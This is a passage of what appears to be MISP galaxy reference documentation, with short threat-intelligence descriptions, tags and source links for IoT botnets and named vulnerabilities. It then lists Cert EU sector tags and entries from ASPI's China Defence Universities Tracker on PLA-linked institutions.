According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants.Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot.The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869.Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.

The tag is: misp-galaxy:botnet="Satori"

Satori is also known as:

Okiru

View relationships graph

Satori has relationships with:

similar: misp-galaxy:tool="Satori" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 535. Table References
Links
https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/
https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant

BetaBot

The tag is: misp-galaxy:botnet="BetaBot"

View relationships graph

BetaBot has relationships with:

similar: misp-galaxy:malpedia="BetaBot" with estimative-language:likelihood-probability="likely"

Hajime

Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown. It is worth mentioning that in the past, the Hajime IoT botnet was never used for massive DDoS attacks, and its existance was a mystery for many researchers, as the botnet only gathered infected devices but almost never did anything with them (except scan for other vulnerable devices).

The tag is: misp-galaxy:botnet="Hajime"

View relationships graph

Hajime has relationships with:

similar: misp-galaxy:malpedia="Hajime" with estimative-language:likelihood-probability="likely"

Table 536. Table References
Links
https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/
https://en.wikipedia.org/wiki/Hajime_(malware)
https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/

Muhstik

The botnet is exploiting the CVE-2018-7600 vulnerability —also known as Drupalgeddon 2— to access a specific URL and gain the ability to execute commands on a server running the Drupal CMS. At the technical level, Netlab says Muhstik is built on top of Tsunami, a very old strain of malware that has been used for years to create botnets by infecting Linux servers and smart devices running Linux-based firmware. Crooks have used Tsunami initially for DDoS attacks, but its feature-set has greatly expanded after its source code leaked online. The Muhstik version of Tsunami, according to a Netlab report published today, can launch DDoS attacks, install the XMRig Monero miner, or install the CGMiner to mine Dash cryptocurrency on infected hosts. Muhstik operators are using these three payloads to make money via the infected hosts.

The tag is: misp-galaxy:botnet="Muhstik"

Table 537. Table References
Links
https://www.bleepingcomputer.com/news/security/big-iot-botnet-starts-large-scale-exploitation-of-drupalgeddon-2-vulnerability/

Hide and Seek

Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise. This is a major game-changing moment in the realm of IoT and router malware. Until today, equipment owners could always remove IoT malware from their smart devices, modems, and routers by resetting the device. The reset operation flushed the device’s flash memory, where the device would keep all its working data, including IoT malware strains. But today, Bitdefender researchers announced they found an IoT malware strain that under certain circumstances copies itself to /etc/init.d/, a folder that houses daemon scripts on Linux-based operating systems —like the ones on routers and IoT devices. By placing itself in this menu, the device’s OS will automatically start the malware’s process after the next reboot.

The tag is: misp-galaxy:botnet="Hide and Seek"

Hide and Seek is also known as:

HNS
Hide 'N Seek

View relationships graph

Hide and Seek has relationships with:

similar: misp-galaxy:malpedia="Hide and Seek" with estimative-language:likelihood-probability="likely"

Table 538. Table References
Links
https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/
https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/
https://www.bleepingcomputer.com/news/security/hide-and-seek-botnet-adds-infection-vector-for-android-devices/

Mettle

Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.

The tag is: misp-galaxy:botnet="Mettle"

Table 539. Table References
Links
https://thehackernews.com/2018/05/botnet-malware-hacking.html

Owari

IoT botnet, Mirai variant that has added three exploits to its arsenal. After a successful exploit, this bot downloads its payload, Owari bot - another Mirai variant - or Omni bot. Author is called WICKED

The tag is: misp-galaxy:botnet="Owari"

View relationships graph

Owari has relationships with:

similar: misp-galaxy:malpedia="Owari" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 540. Table References
Links
https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html

Brain Food

Brain Food is usually the second step in a chain of redirections, its PHP code is polymorphic and obfuscated with multiple layers of base64 encoding. Backdoor functionalities are also embedded in the code allowing remote execution of shell code on web servers which are configured to allow the PHP 'system' command.

The tag is: misp-galaxy:botnet="Brain Food"

Table 541. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/brain-food-botnet-gives-website-operators-heartburn

Pontoeb

The bot gathers information from the infected system through WMI queries (SerialNumber, SystemDrive, operating system, processor architecture), which it then sends back to a remote attacker. It installs a backdoor giving an attacker the possibility to run command such as: download a file, update itself, visit a website and perform HTTP, SYN, UDP flooding

The tag is: misp-galaxy:botnet="Pontoeb"

Pontoeb is also known as:

N0ise

Table 542. Table References
Links
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MSIL/Pontoeb.J
http://dataprotectioncenter.com/general/are-you-beta-testing-malware/

Trik Spam Botnet

The tag is: misp-galaxy:botnet="Trik Spam Botnet"

Trik Spam Botnet is also known as:

Trik Trojan

Table 543. Table References
Links
https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/

Madmax

The tag is: misp-galaxy:botnet="Madmax"

Madmax is also known as:

Mad Max

View relationships graph

Madmax has relationships with:

similar: misp-galaxy:tool="Mad Max" with estimative-language:likelihood-probability="likely"

Table 544. Table References
Links
https://news.softpedia.com/news/researchers-crack-mad-max-botnet-algorithm-and-see-in-the-future-506696.shtml

Pushdo

The tag is: misp-galaxy:botnet="Pushdo"

View relationships graph

Pushdo has relationships with:

similar: misp-galaxy:malpedia="Pushdo" with estimative-language:likelihood-probability="likely"

Table 545. Table References
Links
https://labs.bitdefender.com/2013/12/in-depth-analysis-of-pushdo-botnet/

Simda

The tag is: misp-galaxy:botnet="Simda"

View relationships graph

Simda has relationships with:

similar: misp-galaxy:malpedia="Simda" with estimative-language:likelihood-probability="likely"

Table 546. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA15-105A

Virut

The tag is: misp-galaxy:botnet="Virut"

View relationships graph

Virut has relationships with:

similar: misp-galaxy:malpedia="Virut" with estimative-language:likelihood-probability="likely"

Table 547. Table References
Links
https://en.wikipedia.org/wiki/Virut

Beebone

The tag is: misp-galaxy:botnet="Beebone"

Table 548. Table References
Links
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions

Bamital

The tag is: misp-galaxy:botnet="Bamital"

Bamital is also known as:

Mdrop-CSK
Agent-OCF

Table 549. Table References
Links
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2FBamital
https://www.symantec.com/security-center/writeup/2010-070108-5941-99

Gafgyt

Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

The tag is: misp-galaxy:botnet="Gafgyt"

Gafgyt is also known as:

Bashlite

View relationships graph

Gafgyt has relationships with:

similar: misp-galaxy:tool="Gafgyt" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="likely"

Table 550. Table References
Links
https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/
https://www.symantec.com/security-center/writeup/2014-100222-5658-99

Sora

Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year.Initial versions were nothing out of the ordinary, and Sora’s original author soon moved on to developing the Mirai Owari version, shortly after Sora’s creation.

The tag is: misp-galaxy:botnet="Sora"

Sora is also known as:

Mirai Sora

View relationships graph

Sora has relationships with:

variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"
variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

Table 551. Table References
Links
https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/

Torii

we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.

The tag is: misp-galaxy:botnet="Torii"

View relationships graph

Torii has relationships with:

similar: misp-galaxy:malpedia="Torii" with estimative-language:likelihood-probability="likely"

Table 552. Table References
Links
https://blog.avast.com/new-torii-botnet-threat-research
https://www.bleepingcomputer.com/news/security/new-iot-botnet-torii-uses-six-methods-for-persistence-has-no-clear-purpose/

Persirai

A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.

The tag is: misp-galaxy:botnet="Persirai"

View relationships graph

Persirai has relationships with:

similar: misp-galaxy:malpedia="Persirai" with estimative-language:likelihood-probability="likely"

Table 553. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

Chalubo

Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo. The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher. This adoption of anti-analysis techniques demonstrates an evolution in Linux malware, as the authors have adopted principles more common to Windows malware in an effort to thwart detection. Like some of its predecessors, Chalubo incorporates code from the Xor.DDoS and Mirai malware families.

The tag is: misp-galaxy:botnet="Chalubo"

Table 554. Table References
Links
https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/

AESDDoS

Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor.Linux.AESDDOS.J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.

The tag is: misp-galaxy:botnet="AESDDoS"

Table 555. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/

Arceus

A set of DDoS botnet.

The tag is: misp-galaxy:botnet="Arceus"

Arceus is also known as:

Katura
MyraV
myra

Mozi

Mozi infects new devices through weak telnet passwords and exploitation.

The tag is: misp-galaxy:botnet="Mozi"

Table 556. Table References
Links
https://blog.netlab.360.com/mozi-another-botnet-using-dht/
https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/
https://securityintelligence.com/posts/botnet-attack-mozi-mozied-into-town/

Branded Vulnerability

List of known vulnerabilities and attacks with a branding.

Branded Vulnerability is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Unknown

Meltdown

Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.

The tag is: misp-galaxy:branded-vulnerability="Meltdown"

Spectre

Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.

The tag is: misp-galaxy:branded-vulnerability="Spectre"

Heartbleed

Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension, thus the bug’s name derives from heartbeat. The vulnerability is classified as a buffer over-read,[5] a situation where more data can be read than should be allowed.

The tag is: misp-galaxy:branded-vulnerability="Heartbleed"

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

The tag is: misp-galaxy:branded-vulnerability="Shellshock"

Ghost

The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue. During a code audit Qualys researchers discovered a buffer overflow in the __nss_hostname_digits_dots() function of glibc. This bug can be triggered both locally and remotely via all the gethostbyname*() functions. Applications have access to the DNS resolver primarily through the gethostbyname*() set of functions. These functions convert a hostname into an IP address.

The tag is: misp-galaxy:branded-vulnerability="Ghost"

Stagefright

Stagefright is the name given to a group of software bugs that affect versions 2.2 ("Froyo") and newer of the Android operating system. The name is taken from the affected library, which among other things, is used to unpack MMS messages. Exploitation of the bug allows an attacker to perform arbitrary operations on the victim’s device through remote code execution and privilege escalation. Security researchers demonstrate the bugs with a proof of concept that sends specially crafted MMS messages to the victim device and in most cases requires no end-user actions upon message reception to succeed—the user doesn’t have to do anything to ‘accept’ the bug, it happens in the background. The phone number is the only target information.

The tag is: misp-galaxy:branded-vulnerability="Stagefright"

Badlock

Badlock is a security bug disclosed on April 12, 2016 affecting the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols[1] supported by Windows and Samba servers.

The tag is: misp-galaxy:branded-vulnerability="Badlock"

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer. The attack itself does not leave traces in the system log.

The tag is: misp-galaxy:branded-vulnerability="Dirty COW"

POODLE

The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryptio") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014" ). Ivan Ristic does not consider the POODLE attack as serious as the Heartbleed and Shellshock attacks. On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

The tag is: misp-galaxy:branded-vulnerability="POODLE"

BadUSB

The ‘BadUSB’ vulnerability exploits unprotected firmware in order to deliver malicious code to computers and networks. This is achieved by reverse-engineering the device and reprogramming it. As the reprogrammed firmware is not monitored or assessed by modern security software, this attack method is extremely difficult for antivirus/security software to detect and prevent.

The tag is: misp-galaxy:branded-vulnerability="BadUSB"

ImageTragick

The tag is: misp-galaxy:branded-vulnerability="ImageTragick"

Blacknurse

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.

The tag is: misp-galaxy:branded-vulnerability="Blacknurse"

SPOILER

SPOILER is a security vulnerability on modern computer central processing units that uses speculative execution to improve the efficiency of Rowhammer and other related memory and cache attacks. According to reports, all modern Intel CPUs are vulnerable to the attack. AMD has stated that its processors are not vulnerable.

The tag is: misp-galaxy:branded-vulnerability="SPOILER"

Table 557. Table References
Links
https://arxiv.org/pdf/1903.00446v1.pdf
https://appleinsider.com/articles/19/03/05/new-spoiler-vulnerability-in-all-intel-core-processors-exposed-by-researchers
https://www.overclock3d.net/news/cpu_mainboard/spoiler_alert_-intel_cpus_impacted_by_new_vulnerability/1[https://www.overclock3d.net/news/cpu_mainboard/spoiler_alert-_intel_cpus_impacted_by_new_vulnerability/1]
https://www.1e.com/news-insights/blogs/the-spoiler-vulnerability/
https://www.bleepingcomputer.com/news/security/amd-believes-spoiler-vulnerability-does-not-impact-its-processors/

BlueKeep

A ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware

The tag is: misp-galaxy:branded-vulnerability="BlueKeep"

Table 558. Table References
Links
https://www.welivesecurity.com/2019/05/22/patch-now-bluekeep-vulnerability/

Cert EU GovSector

Cert EU GovSector.

Cert EU GovSector is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various

Constituency

The tag is: misp-galaxy:cert-eu-govsector="Constituency"

EU-Centric

The tag is: misp-galaxy:cert-eu-govsector="EU-Centric"

EU-nearby

The tag is: misp-galaxy:cert-eu-govsector="EU-nearby"

World-class

The tag is: misp-galaxy:cert-eu-govsector="World-class"

Unknown

The tag is: misp-galaxy:cert-eu-govsector="Unknown"

Outside World

The tag is: misp-galaxy:cert-eu-govsector="Outside World"

China Defence Universities Tracker

The China Defence Universities Tracker is a database of Chinese institutions engaged in military or security-related science and technology research. It was created by ASPI’s International Cyber Policy Centre..

China Defence Universities Tracker is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Australian Strategic Policy Institute

Academy of Military Science (中国人民解放军军事科学院)

AMS is responsible for leading and coordinating military science for the whole military. AMS is involved in not only the development of theory, strategy, and doctrine but also advancing national defense innovation. Pursuant to the PLA reforms, AMS has undergone dramatic changes starting in June 2017. At a July 2017 ceremony marking the AMS’s reorganisation, Xi urged the AMS to construct a ‘world-class military scientific research institution.’ Through the National Defence Science and Technology Innovation Institute, the AMS is pursuing research in cutting-edge technologies including unmanned systems, artificial intelligence, biotechnology and quantum technology.

The tag is: misp-galaxy:china-defence-universities="Academy of Military Science (中国人民解放军军事科学院)"

Table 559. Table References
Links
https://unitracker.aspi.org.au/universities/academy-of-military-science

Aero Engine Corporation of China (中国航空发动机集团有限公司)

AECC is a leading producer of aircraft parts for the People’s Liberation Army (PLA), having separated from its parent company the Aviation Industry Corporation of China (AVIC) in 2016. The company reports having 27 affiliated or subordinate companies, three major listed companies, and 84,000 staff. AVIC and the Commercial Aircraft Corporation of China (also known as COMAC) are major shareholders in AECC.AECC’s main products include aircraft engines, combustion gas turbines, and transmission systems. AECC also develops aircraft power units, helicopter drive systems, monocrystalline blades, turbine disks, and graphene.AECC was established in order to improve China’s capability in developing domestically built aircraft engines as part of the ‘Made in China 2025’ program. A priority is strengthening its supply chains within China. Though indigenously developed engines have proven challenging for AECC, the company had purported success in providing thrust vector control technology for the J-10B fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aero Engine Corporation of China (中国航空发动机集团有限公司)"

Table 560. Table References
Links
https://unitracker.aspi.org.au/universities/aero-engine-corporation-of-china

Air Force Command College (中国人民解放军空军指挥学院)

The PLA Air Force Command College in Beijing is considered the PLA Air Force’s ‘peak institution for educating mid-rank and senior officers’ for command posts across the service. The college has a long history and was initially established in Nanjing during the early years of the People’s Republic in 1958.The Air Force Command College offers a range of degree programmes, mainly at the postgraduate level, including training in military disciplines such as military history, strategy, and tactics. It has published research on control science and radar. The college’s other specialties include battlefield command, military operations as well as political–ideological education.

The tag is: misp-galaxy:china-defence-universities="Air Force Command College (中国人民解放军空军指挥学院)"

Table 561. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-command-college

Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)

The Air Force Communications Officers Academy is the PLA’s premier institution for the training of non-commissioned officers in communications systems and security. Established in 1986 as the Dalian Communications NCO College, the institution was renamed after Xi Jinping’s military reforms in 2017. The academy’s areas of research include command automation and satellite communications, along with wired and wireless communications.

The tag is: misp-galaxy:china-defence-universities="Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)"

Table 562. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-communications-officers-college

Air Force Early Warning Academy (中国人民解放军空军预警学院)

The Air Force Early Warning Academy is ‘an institution that trains military personnel from the PLA Air Force and Navy’s radar and electronic warfare units in command, engineering and technology’ that was established after the amalgamation of the Air Defence Academy and Radar College in 1958. As such, the Air Force Early Warning Academy focuses its research on radar engineering, information command systems engineering, networked command engineering, and early warning detection systems.

The tag is: misp-galaxy:china-defence-universities="Air Force Early Warning Academy (中国人民解放军空军预警学院)"

Table 563. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-early-warning-academy

Air Force Engineering University (中国人民解放军空军工程大学)

The Air Force Engineering University (AFEU) is one of the PLA’s five comprehensive universities alongside NUDT, Naval Engineering University, PLA Information Engineering University and Army Engineering University. It trains students in a variety of engineering and military disciplines related to air combat.AFEU currently has around 8,000 students, including 1,600 postgraduate students. Its priority areas include technical studies in information and communication systems engineering as well as in social sciences such as in professional military training. Research into unmanned aerial vehicle technology is another important area of research at the university. In 2017, China’s Ministry of Education ranked AFEU equal fourth for armament science out of nine universities, only awarding it a B- grade for the discipline.Colleges under AFEU include:

The tag is: misp-galaxy:china-defence-universities="Air Force Engineering University (中国人民解放军空军工程大学)"

Table 564. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-engineering-university

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

The tag is: misp-galaxy:china-defence-universities="Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)"

Table 565. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-flight-academy-shijiazhuang

Air Force Harbin Flight Academy (空军哈尔滨飞行学院)

The Academy is home to the Air Force Harbin Flight Academy Simulation Training Center, 2,500m2 large-scale aircraft simulator where students can train in simulated transport and bomber aircraft. The Academy hopes to continue developing the Simulation Training Center into a ‘laboratory for air operations,’ including advanced trainings like simulated tactical confrontations.

The tag is: misp-galaxy:china-defence-universities="Air Force Harbin Flight Academy (空军哈尔滨飞行学院)"

Table 566. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-harbin-flight-academy

Air Force Logistics University (中国人民解放军空军后勤学院)

The Air Force Logistics University is an institution devoted to the study of command, management and technology for the PLA, established in Shanxi by the Central Military Commission in 1954. The university focusses its research on ‘management engineering’ for military equipment such as weaponry and aircraft fuel and also maintains research programmes on air battle command and personnel management.

The tag is: misp-galaxy:china-defence-universities="Air Force Logistics University (中国人民解放军空军后勤学院)"

Table 567. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-logistics-university

Air Force Medical University (中国人民解放军空军军医大学)

The Air Force Medical University, also known as the Fourth Military Medical University, is the PLA’s premier institution for research into medical and psychological sciences, having been placed under command of the Air Force after Xi Jinping’s military reforms in 2017. Its major areas of study are medical and psychological sciences tailored for personnel engaging in air and space operations, military preventative medicine and various other forms of clinical research.The Air Force Medical University conducts significant amounts of psychological research. Scientists from the Air Force Medical University have written studies on suicide, mental health across China, and mental health in military universities. The university’s scientists have also looked at the extent to which mindfulness training can reduce anxiety for undergraduates at military universities, and at how fear induced by virtual combat scenarios impacts decision-making. This indicates that the university is interested in issues of troop morale and decision-making in high-stress situations.

The tag is: misp-galaxy:china-defence-universities="Air Force Medical University (中国人民解放军空军军医大学)"

Table 568. Table References
Links
https://unitracker.aspi.org.au/universities/fourth-military-medical-university

Air Force Research Institute (中国人民解放军空军研究院)

The Air Force Research Institute is an air force scientific research institute, the successor to the Air Force Equipment Academy (空军装备研究院), that was established in 2017. The institute runs the Key Laboratory of Complex Aviation System Simulation (复杂航空系统仿真国防重点实验室) and carries out research on areas such as aircraft design, flight control, guidance and navigation, and electronic countermeasures.

The tag is: misp-galaxy:china-defence-universities="Air Force Research Institute (中国人民解放军空军研究院)"

Table 569. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-research-institute

Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)

Created upon the merger of the PLA Air Force’s Second and Fifth Flight Academies in 2011, the Air Force Xi’an Flight Academy specialises in training airmen in aviation while passing on the PLA’s ‘revolutionary traditions’. It remains ‘one of the Air Force’s three advanced institutions in air combat, and is known to train the PLA Air Force’s JJ-7 fighter pilots. Given this focus on training, the institution engages in little scientific research.

The tag is: misp-galaxy:china-defence-universities="Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)"

Table 570. Table References
Links
https://unitracker.aspi.org.au/universities/air-force-xian-flight-academy

Anhui University (安徽大学)

Anhui University is overseen by the Anhui Provincial Government. In January 2019, defence industry agency SASTIND and the Anhui Provincial Government signed an agreement to jointly develop Anhui University. This agreement with SASTIND suggests that the university will increase its role in defense research in the future.

The tag is: misp-galaxy:china-defence-universities="Anhui University (安徽大学)"

Table 571. Table References
Links
https://unitracker.aspi.org.au/universities/anhui-university

Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)

The Army Academy of the Armored Forces is China’s lead institute responsible for training and research for armoured combat. This includes a focus on tank warfare, mechanised artillery and infantry operations. The academy offers training in ‘armored combat command, surveillance and intelligence, operational tactics’ as well as in engineering disciplines relevant to operations involving the PLA Ground Force’s armoured corps, such as materials science, mechanical engineering, electrical engineering and automation, communications engineering, weapons systems engineering and photoelectric information science.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)"

Table 572. Table References
Links
https://unitracker.aspi.org.au/universities/army-academy-of-armored-forces

Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)

The Army Academy of Artillery and Air Defense is an institution devoted to training artillery and air defence officers in the PLA Ground Force. Its areas of focus include electrical engineering and automation, munitions engineering and explosives technology, radar engineering, and missile engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)"

Table 573. Table References
Links
https://unitracker.aspi.org.au/universities/army-academy-of-artillery-and-air-defense

Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)

With a history dating back to 1941, the Army Academy of Border and Coastal Defense is the only institution of higher education devoted to training PLA Ground Force personnel in border and coastal defence operations. Its subjects of focus include firepower command and control engineering, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)"

Table 574. Table References
Links
https://unitracker.aspi.org.au/universities/army-academy-of-border-and-coastal-defense

Army Aviation College (中国人民解放军陆军航空兵学院)

The Army Aviation College is the PLA’s institution responsible for training mid-career helicopter pilots from the PLA Air Force and aviation officers from the PLA Ground Force. The college’s subject areas include aircraft and engine design, aviation communications and air defence systems, flight radar maintenance engineering, and combat aircraft maintenance engineering.

The tag is: misp-galaxy:china-defence-universities="Army Aviation College (中国人民解放军陆军航空兵学院)"

Table 575. Table References
Links
https://unitracker.aspi.org.au/universities/army-aviation-college

Army Engineering University (中国人民解放军陆军工程大学)

The Army Engineering University was established in 2017 following the abolition of the PLA University of Science and Technology. The university is devoted to research on ‘engineering, technology and combat command systems’ for the PLA Land Force.The university’s areas of research include:

The tag is: misp-galaxy:china-defence-universities="Army Engineering University (中国人民解放军陆军工程大学)"

Table 576. Table References
Links
https://unitracker.aspi.org.au/universities/army-engineering-university

Army Infantry Academy (中国人民解放军陆军步兵学院)

The Army Infantry Academy is a higher education institution in China devoted to providing elementary training in command for infantry soldiers in the PLA Ground Force. The academy teaches courses in operational disciplines such as command information systems engineering, armored vehicles engineering and weapons systems engineering. As well as providing formal teaching, the Army Infantry Academy also provides oversight for training exercises and electronic warfare simulations.

The tag is: misp-galaxy:china-defence-universities="Army Infantry Academy (中国人民解放军陆军步兵学院)"

Table 577. Table References
Links
https://unitracker.aspi.org.au/universities/army-infantry-academy

Army Medical University (中国人民解放军陆军军医大学)

The PLA Army Medical University, formerly known as the Third Military Medical University, is a medical education university affiliated with the PLA Ground Force. It was formed in 2017 through a merger with the PLA Western Theater Command Urumqi Comprehensive Training Base’s Military Medical Training Brigade and the Tibet Military Region’s Eighth Hospital. The Army Medical University includes six national key laboratories and 32 Ministry of Education or military key laboratories. It has won military awards for science and technology progress and seven national science and technology prizes.

The tag is: misp-galaxy:china-defence-universities="Army Medical University (中国人民解放军陆军军医大学)"

Table 578. Table References
Links
https://unitracker.aspi.org.au/universities/army-medical-university

Army Military Transportation Academy (中国人民解放军陆军军事交通学院)

The Army Military Transport Academy is a higher education institution devoted to training PLA Ground Force personnel in military transport and logistics. The academy focusses on military transport command engineering, command and automation engineering, ordnance engineering, and armament sustainment command.

The tag is: misp-galaxy:china-defence-universities="Army Military Transportation Academy (中国人民解放军陆军军事交通学院)"

Table 579. Table References
Links
https://unitracker.aspi.org.au/universities/army-military-transportation-academy-2

Army Research Institute (中国人民解放军陆军研究院)

